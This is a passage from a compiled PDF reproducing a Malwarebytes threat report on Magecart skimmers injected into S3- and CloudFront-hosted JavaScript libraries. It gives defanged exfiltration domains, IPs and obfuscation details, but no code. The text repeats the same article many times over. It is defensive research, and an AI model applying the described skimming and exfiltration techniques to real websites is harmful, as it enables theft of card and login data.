themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 132 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 133 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 134 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 135 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 136 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 137 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 138 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 139 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 140 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 141 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 142 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 143 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 144 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 145 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 146 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 147 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 148 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 149 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 150 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 151 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 152 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 153 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 154 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 155 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 156 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 157 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 158 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 159 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 160 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 161 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 162 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 163 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 164 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 165 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found 